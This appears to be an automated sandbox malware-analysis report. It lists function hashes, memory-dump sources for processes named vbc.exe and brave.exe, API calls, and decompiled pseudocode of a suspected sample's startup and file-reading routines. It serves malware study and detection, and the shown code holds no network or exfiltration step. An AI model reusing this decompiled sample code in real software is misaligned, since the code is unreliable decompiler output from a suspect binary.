Opcode Fuzzy Hash: 3d4112bf413d2fc8f30c66e06119213b56a7e401152684220d76f13baddb22c6
Instruction Fuzzy Hash: FB213DB1514344DFDF05DF50E8C0B16BB75FB88314F2486B9E9464B286C33AE816CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fde2f27a2088ac6d57c6ea766efebc4acc75902bde9f05c362337a1d592fec
Instruction ID: 1964c57dd7cf8ed74065a6f50d99a5818ef224f47e9cad41b16cf13bfea93606
Opcode Fuzzy Hash: 81fde2f27a2088ac6d57c6ea766efebc4acc75902bde9f05c362337a1d592fec
Instruction Fuzzy Hash: 8D2107F1614244DFDB05CF14E9C0B26BB65FB98328F2485A9E9074B246C33AD956CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d412a2fea02194970d8890211a2a927f5452d365b46de4380b34b249f6aa545
Instruction ID: 944219742229af99e69674754d77ac6eca5b56428f21c2ba8fd0d2e7c36e5866
Opcode Fuzzy Hash: 7d412a2fea02194970d8890211a2a927f5452d365b46de4380b34b249f6aa545
Instruction Fuzzy Hash: 6F2137B1504204EFDB04DF10E8C0B26BB65FB94324F24C6A9E94A4B206C33AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D81B Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98d78fd83e865ba92abc5d4b5cfb0d50f27998642fb4fbc41ce9e12a775ae67d
Instruction ID: ab62e3711405a02c52cd0a1e6298eaa40f93e639f4ef7b1d4cec4f517becf3e0
Opcode Fuzzy Hash: 98d78fd83e865ba92abc5d4b5cfb0d50f27998642fb4fbc41ce9e12a775ae67d
Instruction Fuzzy Hash: 8621A276504280DFCF06CF10E9C4B56BF71FB88314F2886A9D9490B656C33AD956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction ID: 9f3268a649552635fa0c4cc88fbbb5e7b50ea4390864c14dadd934dc1e6428fd
Opcode Fuzzy Hash: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction Fuzzy Hash: 6511E6B6504280CFCF12CF10D5C4B16BF71FB94324F28C6A9D8460B616C33AD956CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction ID: e7e41b133e7e1c5fd9a5638ceca1ede050e8449274d215396ed1cc66faca91ec
Opcode Fuzzy Hash: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction Fuzzy Hash: C311E676404280DFCF01CF10E5C4B16BF72FB94320F28C6A9D8490B616C33AE956CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D971 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9662584a8e490d8295cf7d65dec8cc8828c46facbf3395c942b0a80800d2535c
Instruction ID: 6cfe7ab9c7de511ec3419df62df30b1eb996fc5b642670201411f62ca7220234
Opcode Fuzzy Hash: 9662584a8e490d8295cf7d65dec8cc8828c46facbf3395c942b0a80800d2535c
Instruction Fuzzy Hash: C301497141D3449AE7105F22EC80767FBD8EF51334F18C05AEE5A5B286CB78A844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D970 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.378937921.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c3d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6b8a66607831b3b93e6462b43f22ccbce42a04869da14abe9899880e71dda8
Instruction ID: 3601feefa77e52c1446067860251b46158b35f1b98cf13f3c8469252a4573703
Opcode Fuzzy Hash: ac6b8a66607831b3b93e6462b43f22ccbce42a04869da14abe9899880e71dda8
Instruction Fuzzy Hash: 10F0F6714043849FE7108F06DCC4B62FFA8EB51334F18C05AED595B286C3B89C44CAB0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: brave.exePID: 6104, Parent PID: 5980COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.9%
Total number of Nodes:	1349
Total number of Limit Nodes:	16

Executed Functions

Function 00007FF6A6001770 Relevance: 21.9, APIs: 11, Strings: 1, Instructions: 890
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF6A6001799
GetTickCount64.KERNEL32 ref: 00007FF6A60017AA

Strings

yAA, xrefs: 00007FF6A6001EB1

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Count64Tick
String ID: yAA
API String ID: 1927824332-3548342407
Opcode ID: 975bb878b5f5d7434c05c65510680b8be18bc88d60cd32d4ebdfc22d5d58c152
Instruction ID: c4039c4afb8017ff760e83d3a3686664ad1bd6af041106ba108cdf18ed550f0d
Opcode Fuzzy Hash: 975bb878b5f5d7434c05c65510680b8be18bc88d60cd32d4ebdfc22d5d58c152
Instruction Fuzzy Hash: 5A92FF22A1A6C285FB218F28E5157BA67A0FF95F84F454131DE8D87B96EF7ED190C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6003170 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 423
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_stricmp.MSVCRT ref: 00007FF6A6003384
strcmp.MSVCRT ref: 00007FF6A600358E
strcmp.MSVCRT ref: 00007FF6A6003640
strcmp.MSVCRT ref: 00007FF6A60036E7
strcmp.MSVCRT ref: 00007FF6A6003797
strcmp.MSVCRT ref: 00007FF6A600383A
strcmp.MSVCRT ref: 00007FF6A60038BA

Strings

y, xrefs: 00007FF6A60034E9
KF , xrefs: 00007FF6A600385B
}, xrefs: 00007FF6A60036FC

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: strcmp$_stricmp
String ID: KF $y$}
API String ID: 3398372305-1747734038
Opcode ID: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction ID: ed5009deb44cea778aee16089602093688eb2dff1169014956fb6645e00c92dc
Opcode Fuzzy Hash: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction Fuzzy Hash: D922F622A0ABC285EB25CF28E5053AA77A4FF55B84F448131DE8D83796DF7EE194C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6001190 Relevance: 10.7, APIs: 7, Instructions: 201
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E00007FF67FF6A6001190(void* __edi, void* __esp) {
				signed char _v120;
				char _v168;
				_Unknown_base(*)()* _t30;
				void* _t32;
				intOrPtr _t39;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				intOrPtr* _t87;
				long long _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				signed short* _t91;
				signed short* _t92;
				long long _t93;
				intOrPtr* _t95;
				intOrPtr _t97;
				long long* _t104;
				intOrPtr* _t109;
				signed short* _t110;
				signed long long _t111;
				void* _t113;
				signed short* _t114;
				long long _t118;
				signed long long _t122;

				_t111 =  *0xa62b69e0; // 0x7ff6a62c10e0
				r9d =  *_t111;
				memset(__edi, 0, 0xd << 0);
				if (r9d != 0) goto 0xa600148b;
				_t97 =  *0xa62b6900; // 0x7ff6a62c1090
				goto 0xa60011f9;
				if ( *((intOrPtr*)( *[gs:0x30] + 8)) ==  *[gs:0x30]) goto 0xa6001434;
				Sleep(??);
				asm("lock dec eax");
				if (_t113 != 0) goto 0xa60011e8;
				_t109 =  *0xa62b6910; // 0x7ff6a62c1098
				if ( *_t109 == 1) goto 0xa600144b;
				if ( *_t109 == 0) goto 0xa60014b4;
				 *0xa62c101c = 1;
				if ( *_t109 == 1) goto 0xa6001460;
				if (0 == 0) goto 0xa6001481;
				_t87 =  *0xa62b6870; // 0x7ff6a62b5a40
				_t88 =  *_t87;
				if (_t88 == 0) goto 0xa600125c;
				r8d = 0;
				E00007FF67FF6A600E830( *_t88());
				_t30 = SetUnhandledExceptionFilter(??);
				_t104 =  *0xa62b68f0; // 0x7ff6a62c1120
				 *_t104 = _t88;
				_t32 = E00007FF67FF6A600E640(E00007FF67FF6A6021D80(_t30, 0x7ff6a6001000));
				_t89 =  *0xa62b6890; // 0x7ff6a6000000
				 *0xa62c1010 = _t89;
				E00007FF67FF6A6021E70(_t32);
				_t90 =  *_t89;
				if (_t90 != 0) goto 0xa60012c3;
				goto 0xa6001308;
				if (2 == 0) goto 0xa60012dd;
				if (2 == 0) goto 0xa60012dd;
				_t91 = _t90 + 2;
				_t52 =  *_t91 & 0x0000ffff;
				if (_t52 - 0x20 <= 0) goto 0xa60012b0;
				r8d = 1;
				r8d = r8d ^ 0x00000001;
				_t48 =  ==  ? r8d : 1;
				goto 0xa60012bf;
				if (_t52 - 1 - 0x1f > 0) goto 0xa6001301;
				asm("o16 nop [cs:eax+eax]");
				_t92 =  &(_t91[1]);
				if (_t97 - 1 - 0x1f <= 0) goto 0xa60012f0;
				 *0xa62c1008 = _t92;
				r8d =  *_t111;
				if (r8d == 0) goto 0xa6001326;
				if ((_v120 & 0x00000001) != 0) goto 0xa600142a;
				 *0xa6033000 = 0xa;
				_t10 =  *0xa62c1038 + 1; // 0x7ffc2fc93ca1
				r13d = _t10;
				_t122 = r13d << 3;
				malloc(??);
				_t110 =  *0xa62c1030; // 0x17a76fb17f0
				_t114 = _t92;
				if (r12d <= 0) goto 0xa60013ab;
				asm("o16 nop [eax+eax]");
				_t93 =  *((intOrPtr*)(_t110 + _t111 * 8));
				if ( *_t93 == 0) goto 0xa6001420;
				r8d = 1;
				if ( *((short*)(_t93 + ( &_v168 + 1) * 2 - 2)) != 0) goto 0xa6001370;
				malloc(??);
				 *((long long*)(_t114 + _t111 * 8)) = _t93;
				memcpy(??, ??, ??);
				if ( *0xa62c1038 != _t111 + 1) goto 0xa6001358;
				_t22 = _t122 - 8; // -8
				 *((long long*)(_t114 + _t22)) = 0;
				 *0xa62c1030 = _t114; // executed
				E00007FF67FF6A600E430();
				_t95 =  *0xa62b68a0; // 0x7ff6a62c2708
				_t118 =  *0xa62c1028; // 0x17a76fb6800
				 *((long long*)( *_t95)) = _t118;
				_t39 = E00007FF67FF6A6001770( *_t95);
				_t50 =  *0xa62c1020; // 0x0
				 *0xa62c1024 = _t39;
				if (_t50 == 0) goto 0xa60014d2;
				_t55 =  *0xa62c101c; // 0x0
				if (_t55 == 0) goto 0xa6001499;
				return _t39;
			}

0x7ff6a600119f
0x7ff6a60011ad
0x7ff6a60011b8
0x7ff6a60011be
0x7ff6a60011cd
0x7ff6a60011e1
0x7ff6a60011eb
0x7ff6a60011f6
0x7ff6a60011fc
0x7ff6a6001204
0x7ff6a6001206
0x7ff6a6001214
0x7ff6a600121e
0x7ff6a6001224
0x7ff6a6001233
0x7ff6a600123b
0x7ff6a6001241
0x7ff6a6001248
0x7ff6a600124e
0x7ff6a6001250
0x7ff6a600125c
0x7ff6a6001268
0x7ff6a600126e
0x7ff6a600127c
0x7ff6a6001284
0x7ff6a6001289
0x7ff6a6001290
0x7ff6a6001297
0x7ff6a600129e
0x7ff6a60012a4
0x7ff6a60012a6
0x7ff6a60012b3
0x7ff6a60012b8
0x7ff6a60012bf
0x7ff6a60012c3
0x7ff6a60012ca
0x7ff6a60012cc
0x7ff6a60012cf
0x7ff6a60012d7
0x7ff6a60012db
0x7ff6a60012e4
0x7ff6a60012e6
0x7ff6a60012f4
0x7ff6a60012ff
0x7ff6a6001301
0x7ff6a6001308
0x7ff6a600130e
0x7ff6a600131a
0x7ff6a6001320
0x7ff6a600132d
0x7ff6a600132d
0x7ff6a6001335
0x7ff6a600133c
0x7ff6a6001341
0x7ff6a6001348
0x7ff6a600134e
0x7ff6a6001352
0x7ff6a6001358
0x7ff6a6001360
0x7ff6a6001366
0x7ff6a600137b
0x7ff6a6001384
0x7ff6a600138c
0x7ff6a600139c
0x7ff6a60013a4
0x7ff6a60013a6
0x7ff6a60013ab
0x7ff6a60013b2
0x7ff6a60013b9
0x7ff6a60013be
0x7ff6a60013c5
0x7ff6a60013d5
0x7ff6a60013df
0x7ff6a60013e4
0x7ff6a60013ea
0x7ff6a60013f2
0x7ff6a60013f8
0x7ff6a6001400
0x7ff6a6001415

APIs

Sleep.KERNEL32 ref: 00007FF6A60011F6
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6A6001268
malloc.MSVCRT ref: 00007FF6A600133C
malloc.MSVCRT ref: 00007FF6A6001384
memcpy.MSVCRT ref: 00007FF6A600139C
GetStartupInfoW.KERNEL32 ref: 00007FF6A600148E

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
String ID:
API String ID: 772431862-0
Opcode ID: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction ID: 6b63b043745e45ccb734594387fc6b90704979f9f945e62aeebd2843a47262a6
Opcode Fuzzy Hash: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction Fuzzy Hash: C4916731E0BA4685FB24AF91E65177923A0BF65F84F8580B5DE0DC3795DE3EE8A08300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60043C0 Relevance: 4.6, APIs: 3, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E00007FF67FF6A60043C0(void* __esi, long long __rax, void* __rcx, long* __rdx) {
				long long _v48;
				char _v56;
				long long _v72;
				long long _v80;
				long _v88;
				long long _v96;
				long long _v104;
				long _t10;
				long _t13;
				long long _t22;
				long* _t25;

				_t22 = __rax;
				_t25 = __rdx;
				E00007FF67FF6A60039D0(1, __rax, __rcx); // executed
				if (_t22 == 0xffffffff) goto 0xa6004470;
				_v56 = 0;
				_v48 = 0;
				_t10 = GetFileSize(??, ??);
				r13d = _t10;
				 *_t25 = _t10;
				GetProcessHeap();
				r8d = r13d;
				HeapAlloc(??, ??, ??); // executed
				r9d = 0;
				r8d = 0;
				_v72 = 0;
				_t13 =  *_t25;
				_v80 = 0;
				_v88 = _t13;
				_v96 = _t22;
				_v104 =  &_v56;
				E00007FF67FF6A6004CEF(); // executed
				E00007FF67FF6A6004D0D(); // executed
				if (_t13 < 0) goto 0xa6004488;
				return _t13;
			}

0x7ff6a60043c0
0x7ff6a60043ca
0x7ff6a60043d2
0x7ff6a60043de
0x7ff6a60043e4
0x7ff6a60043f2
0x7ff6a60043fb
0x7ff6a6004401
0x7ff6a6004404
0x7ff6a6004406
0x7ff6a600440c
0x7ff6a6004414
0x7ff6a600441a
0x7ff6a600441d
0x7ff6a6004422
0x7ff6a600442e
0x7ff6a6004433
0x7ff6a600443c
0x7ff6a6004445
0x7ff6a600444a
0x7ff6a600444f
0x7ff6a6004459
0x7ff6a6004460
0x7ff6a600446f

APIs

Part of subcall function 00007FF6A60039D0: wcslen.MSVCRT ref: 00007FF6A6003A58
Part of subcall function 00007FF6A60039D0: wcslen.MSVCRT ref: 00007FF6A6003AE6

GetFileSize.KERNEL32 ref: 00007FF6A60043FB
GetProcessHeap.KERNEL32 ref: 00007FF6A6004406
HeapAlloc.KERNEL32 ref: 00007FF6A6004414

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Heapwcslen$AllocFileProcessSize
String ID:
API String ID: 3094376029-0
Opcode ID: 573f6b3d23fbca287f8359be03058163197aa1dff85e69532b243d527b8605eb
Instruction ID: 29e18b80951ad57b6d05757238d306a57e915b6e5f1cfae5a688e0638ceb9e39
Opcode Fuzzy Hash: 573f6b3d23fbca287f8359be03058163197aa1dff85e69532b243d527b8605eb
Instruction Fuzzy Hash: 4D110332A06A1081EB11EB26B905B477290BB84FBCF800236DE5D43798EF7DD085C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6032490 Relevance: 1.4, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00007FF67FF6A6032490() {
				long long _v296;
				void* _t51;
				void* _t53;
				void* _t54;
				int _t56;
				long long* _t65;
				void* _t66;
				void* _t67;
				int _t75;
				void* _t120;
				int _t121;
				int _t122;
				int _t123;
				int _t124;
				int _t125;
				int _t130;

				E00007FF67FF6A60319A0(_t53, _t54, _t56, _t67);
				_t121 = _t56;
				E00007FF67FF6A602A110(_t56, _t67);
				E00007FF67FF6A6032160(0x10, _t51, _t56, _t66, _t121, 0xa62b6bb0, 0x7ff6a602a230, _t120, _t121, _t67);
				_t128 = _t56;
				E00007FF67FF6A6031CF0(_t121);
				E00007FF67FF6A600FEC0();
				_push(_t56);
				_push(_t121);
				E00007FF67FF6A60319A0(_t53, _t54, _t56, _t128);
				_t122 = _t56;
				E00007FF67FF6A602A290(_t56, _t128);
				E00007FF67FF6A6032160(0x10, _t51, _t56, _t66, _t122, 0xa62b6bd0, 0x7ff6a602a3b0, _t120, _t122, _t128);
				_t130 = _t56;
				E00007FF67FF6A6031CF0(_t122);
				_t75 = _t130;
				E00007FF67FF6A600FEC0();
				_push(_t130);
				_push(_t122);
				E00007FF67FF6A60319A0(_t53, _t54, _t56, _t75);
				_t123 = _t56;
				E00007FF67FF6A602A7A0(_t56, _t75);
				E00007FF67FF6A6032160(0x10, _t51, _t56, _t66, _t123, 0xa62b6c10, 0x7ff6a602a8d0, _t120, _t123, _t75);
				_t132 = _t56;
				E00007FF67FF6A6031CF0(_t123);
				E00007FF67FF6A600FEC0();
				_push(_t56);
				_push(_t123);
				E00007FF67FF6A60319A0(_t53, _t54, _t56, _t132);
				_t124 = _t56;
				E00007FF67FF6A6029850(_t56, _t132);
				E00007FF67FF6A6032160(0x10, _t51, _t56, _t66, _t124, 0xa62b6b70, 0x7ff6a6029970, _t120, _t124, _t132);
				_t134 = _t56;
				E00007FF67FF6A6031CF0(_t124);
				E00007FF67FF6A600FEC0();
				_push(_t56);
				_push(_t124);
				E00007FF67FF6A60319A0(_t53, _t54, _t56, _t134);
				_t125 = _t56;
				E00007FF67FF6A602A970(_t56, _t134);
				E00007FF67FF6A6032160(0x10, _t51, _t56, _t66, _t125, 0xa62b6c30, 0x7ff6a602aa90, _t120, _t125, _t134);
				_t136 = _t56;
				E00007FF67FF6A6031CF0(_t125);
				E00007FF67FF6A600FEC0();
				_push(_t56);
				E00007FF67FF6A60319A0(_t53, _t54, _t56, _t136);
				_t126 = _t56;
				E00007FF67FF6A602AAF0(_t56, _t136);
				E00007FF67FF6A6032160(0x10, _t51, _t56, _t66, _t56, 0xa62b6c50, 0x7ff6a602ac10, _t120, _t56, _t136);
				E00007FF67FF6A6031CF0(_t126);
				E00007FF67FF6A600FEC0();
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				_t65 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6A6010980(0xa62b2d20, 0xa62b6c50);
				 *0xa62b2d38 = 0x12400; // executed
				malloc(_t125); // executed
				 *0xa62b2d30 = _t65;
				if (_t65 == 0) goto 0xa6032789;
				 *0xa62b2d28 = _t65;
				 *_t65 = 0x12400;
				 *((long long*)(_t65 + 8)) = 0;
				goto E00007FF67FF6A6001520;
				 *0xa62b2d38 = 0;
				 *0xa62b2d28 = 0;
				goto 0xa6032779;
				0;
				0;
				0;
			}

0x7ff6a60324a0
0x7ff6a60324ab
0x7ff6a60324ae
0x7ff6a60324c4
0x7ff6a60324c9
0x7ff6a60324cf
0x7ff6a60324d7
0x7ff6a60324e0
0x7ff6a60324e2
0x7ff6a60324f0
0x7ff6a60324fb
0x7ff6a60324fe
0x7ff6a6032514
0x7ff6a6032519
0x7ff6a603251f
0x7ff6a6032524
0x7ff6a6032527
0x7ff6a6032530
0x7ff6a6032532
0x7ff6a6032540
0x7ff6a603254b
0x7ff6a603254e
0x7ff6a6032564
0x7ff6a6032569
0x7ff6a603256f
0x7ff6a6032577
0x7ff6a6032580
0x7ff6a6032582
0x7ff6a6032590
0x7ff6a603259b
0x7ff6a603259e
0x7ff6a60325b4
0x7ff6a60325b9
0x7ff6a60325bf
0x7ff6a60325c7
0x7ff6a60325d0
0x7ff6a60325d2
0x7ff6a60325e0
0x7ff6a60325eb
0x7ff6a60325ee
0x7ff6a6032604
0x7ff6a6032609
0x7ff6a603260f
0x7ff6a6032617
0x7ff6a6032620
0x7ff6a6032630
0x7ff6a603263b
0x7ff6a603263e
0x7ff6a6032654
0x7ff6a603265f
0x7ff6a6032667
0x7ff6a6032670
0x7ff6a6032681
0x7ff6a6032683
0x7ff6a6032694
0x7ff6a6032696
0x7ff6a60326a7
0x7ff6a60326a9
0x7ff6a60326ba
0x7ff6a60326bc
0x7ff6a60326c7
0x7ff6a60326c9
0x7ff6a60326da
0x7ff6a60326dc
0x7ff6a60326ed
0x7ff6a60326ef
0x7ff6a6032700
0x7ff6a6032702
0x7ff6a6032713
0x7ff6a6032715
0x7ff6a603271e
0x7ff6a6032726
0x7ff6a603272e
0x7ff6a603273d
0x7ff6a6032747
0x7ff6a6032752
0x7ff6a6032757
0x7ff6a6032761
0x7ff6a6032763
0x7ff6a603276a
0x7ff6a6032771
0x7ff6a6032784
0x7ff6a6032789
0x7ff6a6032794
0x7ff6a603279f
0x7ff6a60327a7
0x7ff6a60327ab
0x7ff6a60327af

APIs

Part of subcall function 00007FF6A60319A0: malloc.MSVCRT(?,?,?,?,00007FF6A60323B5,?,?,?,?,00007FF6A6003C24), ref: 00007FF6A60319B1

Part of subcall function 00007FF6A602A110: strlen.MSVCRT ref: 00007FF6A602A13B

Part of subcall function 00007FF6A600FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF6A600FF45
Part of subcall function 00007FF6A600FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF6A600FF63
Part of subcall function 00007FF6A600FEC0: abort.MSVCRT ref: 00007FF6A600FF69

Part of subcall function 00007FF6A602A290: strlen.MSVCRT ref: 00007FF6A602A2BB

Part of subcall function 00007FF6A602A7A0: strlen.MSVCRT ref: 00007FF6A602A7CB

